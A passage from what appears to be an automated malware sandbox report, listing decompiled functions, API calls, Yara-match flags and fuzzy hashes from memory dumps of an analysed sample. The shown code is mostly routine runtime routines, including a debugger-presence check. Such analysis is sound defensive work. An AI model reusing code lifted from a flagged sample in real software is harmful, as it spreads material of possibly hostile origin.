            • Opcode Fuzzy Hash: 5d14829989531930b1854249c49e1b63a321099de860878ae6958a58ebef3297
            • Instruction Fuzzy Hash: 6E1110B58043489FDB20CF99C489BDEBBF8EB48310F10885AE918A7300C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C1540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: b165d3d236109801be35905e5703a7df355b6da75ba32eac9747f9bec05cb2ee
            • Instruction ID: 611880c73501ffc423b5d0d13d7bd3b1c1ec5a8dbe0925e21bf18aba0fa86dac
            • Opcode Fuzzy Hash: b165d3d236109801be35905e5703a7df355b6da75ba32eac9747f9bec05cb2ee
            • Instruction Fuzzy Hash: FE11E3B58043489FDB20CF99D444BDEBFF8EB58314F10845AE959A7600C375A945CFE1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C50D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 4e349e780e2655565142c4409c0e2eb0238f67d321f20b1c69ce05237caf9be0
            • Instruction ID: b3d9c3ef09193e84354ed68ba3665c13b9c30965230f5ac73bd228313bbc77f8
            • Opcode Fuzzy Hash: 4e349e780e2655565142c4409c0e2eb0238f67d321f20b1c69ce05237caf9be0
            • Instruction Fuzzy Hash: 2A11E0B58042489FDB20CF99D488BDEFBF8EB58310F10846AE919A7200C375A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022C95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 4a01706d877bf08914a6e85e076a8f9f266c2813faa708a966775cda28c7c3fd
            • Instruction ID: ceb27ec32c0adab87910af080bef08c9ff32000e1b8641a24707e88e87986cbe
            • Opcode Fuzzy Hash: 4a01706d877bf08914a6e85e076a8f9f266c2813faa708a966775cda28c7c3fd
            • Instruction Fuzzy Hash: 5211E0B5D006498FDB20CF9AD444BDEFBF4AB88314F24852AD869A7640C375A546CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CBC59, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 126aead270306d2a2d61674a39af740cf4f537a30cebe71e7f9c80550d88025c
            • Instruction ID: 812efc1ff0360d5544f36905e2f43e941171026f32d89d1feae9bf6a53fefdb1
            • Opcode Fuzzy Hash: 126aead270306d2a2d61674a39af740cf4f537a30cebe71e7f9c80550d88025c
            • Instruction Fuzzy Hash: C911F2B58042489FDB10CF99D889BDEFFF8EB48310F10841AE918A7600C375A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CFE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: 7c1a61c7f960cc826a8bed3399822b1d4524dda67e43b38e75377b6d590a264a
            • Instruction ID: 07d141c697d00dc52b71db479baa78aafa56a16fb5079b21695d3702471d6cd1
            • Opcode Fuzzy Hash: 7c1a61c7f960cc826a8bed3399822b1d4524dda67e43b38e75377b6d590a264a
            • Instruction Fuzzy Hash: D01115B59002498FDB10CF99D584BDFFBF8EB48324F20851AD818A7740C374A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 94%
            			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







            0x00403e3d
            0x00403e43
            0x00403e49
            0x00403e7b
            0x00403e80
            0x00403e86
            0x00000000
            0x00403e86
            0x00403e4d
            0x00403e4f
            0x00403e4f
            0x00403e66
            0x00403e6f
            0x00403e77
            0x00000000
            0x00000000
            0x00403e57
            0x00403e59
            0x00000000
            0x00000000
            0x00403e5c
            0x00403e61
            0x00403e62
            0x00403e64
            0x00000000
            0x00000000
            0x00403e64
            0x00000000

            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
            • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
            • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D5B0, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction ID: d2ca6ed1b6440d7f5080a4583c1daaff20e65f8a9fd8ee4dd77e8c4d959c8f29
            • Opcode Fuzzy Hash: 09e181571646fab02b154b36c8d3c70b51798e13813ff58a2571621cc130eae6
            • Instruction Fuzzy Hash: 3B21FFB9608240DFDB01CF10D8C0F26BFA5FBD8324F258569E9094B20AC336D856CAA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D4C4, Relevance: .1, Instructions: 75COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction ID: 4e6cd1db5c62a66db082174dd0bd63ccd1666705beebe1e414c5fb5947d5310b
            • Opcode Fuzzy Hash: 4cd168af5382a5f3b79a4005a7cb978bb665a625fff909facd1de11e375a819a
            • Instruction Fuzzy Hash: A02103B5604240DFDB01DF10D8C0F26BF65FBC8328F24C569E9054B206C736D816CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D1D4, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction ID: 04576ac74910b4bc42bee346c726ae7574bc732105acf5ab3e2bb11b82580b23
            • Opcode Fuzzy Hash: 381067b71ab18ab4fcfede9e131d770658490e5e24dd37ee4f5f86089a5567f2
            • Instruction Fuzzy Hash: D021F2B0604240EFDB21CF50D9C0B6ABBA5FB84315F24CA6DED094B246C376D84ACA61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D01C, Relevance: .1, Instructions: 72COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction ID: 812714ad889eaf552500a354d2ec0f64425522f36ade3a39716da490b8c8e97a
            • Opcode Fuzzy Hash: d01c81b841efe660029345fff8d8486fee43bc18630c8cd5ef261f9cf3574fbe
            • Instruction Fuzzy Hash: F921D775604244DFDB24DF14D4C4B16BB65FB84315F34C569DD4A4B286C33AD84BCB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D005, Relevance: .1, Instructions: 60COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction ID: 13d16721fd3f24b418c7888ccfacf4f21d0b359d47de42b1cba6986dad3f267a
            • Opcode Fuzzy Hash: b7b08944f4130ee9e850c3dbd9a7e49a038f714d4d17a9321dd3843d68d52ee7
            • Instruction Fuzzy Hash: F4215E755093C08FDB12CF20D994B15BF71FB46314F28C6EAD8498B697C33A980ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D5AB, Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 00445a8c0758d4e0d59564b2606d71bbe85c0c041a61742c8880607e0fa90ca6
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 63117C76504280DFCF16CF14D9C4B16FF62FB98324F25C6A9D8094B656C33AD85ACBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D4BF, Relevance: .1, Instructions: 56COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction ID: 7a2edfa98ed5f9484cf9d60ca4dce4610025f8788a1c1028a681dd39cb703040
            • Opcode Fuzzy Hash: 2d1ced6dc2e75453a2601a127eb843bfa51fca63bdaac9e78988749db0cf302c
            • Instruction Fuzzy Hash: 24119376504280DFCF15CF14D5C4B16BF71FB94324F24C6A9D8494B656C336D856CBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A5D1CF, Relevance: .1, Instructions: 53COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905358467.0000000000A5D000.00000040.00000001.sdmp, Offset: 00A5D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction ID: 8bc4d8239bceacb3a0b6b40637ebe4939650f36a80dbb211a4880d0d9c2648d1
            • Opcode Fuzzy Hash: 47f075cdb6666318d721bc5846118bef7950f0453c65f354d1bc6af126a2814c
            • Instruction Fuzzy Hash: 01118B75904280DFCB21CF10D5C4B59FBA1FB84324F24C6AEDC494B656C33AD85ACB62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D01D, Relevance: .0, Instructions: 45COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f64deb071c9dc5dfb0d9ee6849a96f8529649027392536761e2ef0db0ed4c079
            • Instruction ID: 44fd112324b93ae4d265b2e8fc18ae50ee00a1bfecd15f498a9743bf4b2c3185
            • Opcode Fuzzy Hash: f64deb071c9dc5dfb0d9ee6849a96f8529649027392536761e2ef0db0ed4c079
            • Instruction Fuzzy Hash: E501DB7550C3809AEB104B25CC84B67FBD8EFD1364F18C55AED4A5B246C3799845C6B1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00A4D01C, Relevance: .0, Instructions: 36COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.905334535.0000000000A4D000.00000040.00000001.sdmp, Offset: 00A4D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ff54fd01c076a61946635034c319ec78b0efd68f234c77d99b6bcab7d3b17de0
            • Instruction ID: 34fbcab56ff94ee0a8295d0d8205ae604fa6fcf9f63998ea626dd03883cbb0fe
            • Opcode Fuzzy Hash: ff54fd01c076a61946635034c319ec78b0efd68f234c77d99b6bcab7d3b17de0
            • Instruction Fuzzy Hash: 6AF06271408284AFEB108B15CC84B62FBD8EBD1724F18C55AED495B286C3799845CAB1
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Function 0040446F, Relevance: 4.6, APIs: 3, Instructions: 78COMMON
            Download Yara Rule
            C-Code - Quality: 74%
            			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x412014; // 0xf8d2dd75
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00401E6A(_t41);
					_pop(_t60);
				}
				E00402460(_t65,  &_v804, 0, 0x50);
				E00402460(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00401E6A(_t57);
				}
				E004018CC();
				return _t57;
			}






































            0x0040446f
            0x0040446f
            0x0040446f
            0x0040447a
            0x0040447f
            0x00404481
            0x00404488
            0x00404489
            0x0040448b
            0x0040448e
            0x00404493
            0x00404493
            0x0040449f
            0x004044b2
            0x004044c0
            0x004044c6
            0x004044cc
            0x004044d2
            0x004044d8
            0x004044de
            0x004044e4
            0x004044ea
            0x004044f0
            0x004044f6
            0x004044fd
            0x00404504
            0x0040450b
            0x00404512
            0x00404519
            0x00404520
            0x00404521
            0x0040452a
            0x00404530
            0x00404533
            0x00404539
            0x00404546
            0x0040454f
            0x00404558
            0x00404561
            0x0040456f
            0x00404571
            0x0040457e
            0x00404586
            0x00404592
            0x00404595
            0x0040459a
            0x004045a1
            0x004045a9

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00404567
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
            • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
            • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
            • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
            • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040208D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			E0040208D(intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t63;
				intOrPtr _t65;
				signed int _t66;
				signed int _t68;
				intOrPtr _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t84;
				intOrPtr* _t86;
				signed int _t91;
				signed int _t94;

				_t84 = __edx;
				 *0x412b2c =  *0x412b2c & 0x00000000;
				 *0x412030 =  *0x412030 | 1;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L20:
					return 0;
				}
				_v24 = _v24 & 0x00000000;
				 *0x412030 =  *0x412030 | 0x00000002;
				 *0x412b2c = 1;
				_t86 =  &_v48;
				_push(1);
				asm("cpuid");
				_pop(_t73);
				 *_t86 = 0;
				 *((intOrPtr*)(_t86 + 4)) = 1;
				 *((intOrPtr*)(_t86 + 8)) = 0;
				 *((intOrPtr*)(_t86 + 0xc)) = _t84;
				_v16 = _v48;
				_v8 = _v36 ^ 0x49656e69;
				_v12 = _v40 ^ 0x6c65746e;
				_push(1);
				asm("cpuid");
				_t75 =  &_v48;
				 *_t75 = 1;
				 *((intOrPtr*)(_t75 + 4)) = _t73;
				 *((intOrPtr*)(_t75 + 8)) = 0;
				 *((intOrPtr*)(_t75 + 0xc)) = _t84;
				if((_v44 ^ 0x756e6547 | _v8 | _v12) != 0) {
					L9:
					_t91 =  *0x412b30; // 0x2
					L10:
					_v32 = _v36;
					_t59 = _v40;
					_v8 = _t59;
					_v28 = _t59;
					if(_v16 >= 7) {
						_t65 = 7;
						_push(_t75);
						asm("cpuid");
						_t77 =  &_v48;
						 *_t77 = _t65;
						 *((intOrPtr*)(_t77 + 4)) = _t75;
						 *((intOrPtr*)(_t77 + 8)) = 0;
						 *((intOrPtr*)(_t77 + 0xc)) = _t84;
						_t66 = _v44;
						_v24 = _t66;
						_t59 = _v8;
						if((_t66 & 0x00000200) != 0) {
							 *0x412b30 = _t91 | 0x00000002;
						}
					}
					if((_t59 & 0x00100000) != 0) {
						 *0x412030 =  *0x412030 | 0x00000004;
						 *0x412b2c = 2;
						if((_t59 & 0x08000000) != 0 && (_t59 & 0x10000000) != 0) {
							asm("xgetbv");
							_v20 = _t59;
							_v16 = _t84;
							if((_v20 & 0x00000006) == 6 && 0 == 0) {
								_t62 =  *0x412030; // 0x2f
								_t63 = _t62 | 0x00000008;
								 *0x412b2c = 3;
								 *0x412030 = _t63;
								if((_v24 & 0x00000020) != 0) {
									 *0x412b2c = 5;
									 *0x412030 = _t63 | 0x00000020;
								}
							}
						}
					}
					goto L20;
				}
				_t68 = _v48 & 0x0fff3ff0;
				if(_t68 == 0x106c0 || _t68 == 0x20660 || _t68 == 0x20670 || _t68 == 0x30650 || _t68 == 0x30660 || _t68 == 0x30670) {
					_t94 =  *0x412b30; // 0x2
					_t91 = _t94 | 0x00000001;
					 *0x412b30 = _t91;
					goto L10;
				} else {
					goto L9;
				}
			}



























            0x0040208d
            0x00402090
            0x0040209e
            0x004020ad
            0x0040222a
            0x00402230
            0x00402230
            0x004020b3
            0x004020b9
            0x004020c4
            0x004020ca
            0x004020cd
            0x004020ce
            0x004020d2
            0x004020d3
            0x004020d5
            0x004020d8
            0x004020dd
            0x004020e6
            0x004020f7
            0x00402102
            0x00402108
            0x00402109
            0x00402111
            0x00402117
            0x00402119
            0x0040211c
            0x0040211f
            0x00402122
            0x00402167
            0x00402167
            0x0040216d
            0x00402174
            0x00402177
            0x0040217a
            0x0040217d
            0x00402180
            0x00402184
            0x00402187
            0x00402188
            0x0040218d
            0x00402190
            0x00402192
            0x00402195
            0x00402198
            0x0040219b
            0x004021a3
            0x004021a6
            0x004021a9
            0x004021ae
            0x004021ae
            0x004021a9
            0x004021bb
            0x004021bd
            0x004021c4
            0x004021d3
            0x004021de
            0x004021e1
            0x004021e4
            0x004021f5
            0x004021fb
            0x00402200
            0x00402203
            0x00402211
            0x00402216
            0x0040221b
            0x00402225
            0x00402225
            0x00402216
            0x004021f5
            0x004021d3
            0x00000000
            0x004021bb
            0x00402127
            0x00402131
            0x00402156
            0x0040215c
            0x0040215f
            0x00000000
            0x00000000
            0x00000000
            0x00000000

            APIs
            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004020A6
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FeaturePresentProcessor
            • String ID:
            • API String ID: 2325560087-3916222277
            • Opcode ID: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
            • Instruction ID: 00a0b3a4e6e1703bd72bf57860e68eebd2cbb95fa7def28fde3004e4e54fdf29
            • Opcode Fuzzy Hash: b5824543732270ab0b84e6c6534a0c658c0f0c8495c1d5a659de4557b6608cfa
            • Instruction Fuzzy Hash: 02515AB19102099BDB15CFA9DA8979ABBF4FB08314F14C57AD804EB390D3B8A915CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004067FE, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004067FE() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x4132b0 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




            0x004067fe
            0x00406806
            0x0040680e

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: HeapProcess
            • String ID:
            • API String ID: 54951025-0
            • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
            • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
            • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
            • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
            Download Yara Rule
            C-Code - Quality: 70%
            			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0xf8d2dd75
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























            0x004078d4
            0x004078d5
